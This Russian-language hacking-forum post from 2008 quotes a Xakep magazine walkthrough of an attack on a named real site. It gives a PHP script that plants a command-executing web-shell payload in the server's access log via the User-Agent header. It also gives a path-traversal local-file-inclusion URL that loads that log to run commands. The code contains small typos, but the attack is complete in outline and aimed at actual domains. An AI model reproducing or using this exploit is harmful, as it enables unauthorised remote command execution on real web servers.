Показать сообщение отдельно

  #3434  
Старый 03.10.2008, 22:24
procedure
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме:
3885269

Репутация: 1158


По умолчанию

Цитата:
Первые успехи

Если локальный шелл никаким образом залить нельзя, то отчего же не внедрить нужный код прямо в лог, а потом заинклудить его с помощью уже известной баги? Итак, сооружаем небольшой php-скрипт для отсылки нужного нам кода:

<?

$site='i.tjat.com'; //адрес сайта

$path='/'; //путь к уязвимому скрипту

$inject='<? system($_GET[cmd]) ?>'; //php-инъекция

$fp = fsockopen($site, 80, $errno, $errstr, 30))

$out = "GET $path HTTP/1.1\r\n";

0$out .= "Host: $site\r\n";

$out .= "Connection: Close\r\n";

$out .= "User-Agent: $inject\r\n\r\n";

fwrite($fp, $out);

fclose($fp);

?>

Запустив этот скрипт у себя на локалхосте и убедившись в том, что он сработал, я соорудил ядовитую ссылку:

http://wap.tjat.com/?lang=ru/../../../../../../../../../../../../../usr/local/apache/logs/imode_icq.com-access_log

Перейдя по ней, я крупно обломался, поскольку на сервере был включен php safe_mode. Но, как ты догадываешься, дорогой читатель, это меня не остановило .
http://www.xakep.ru/magazine/xa/101/086/1.asp
 
Ответить с цитированием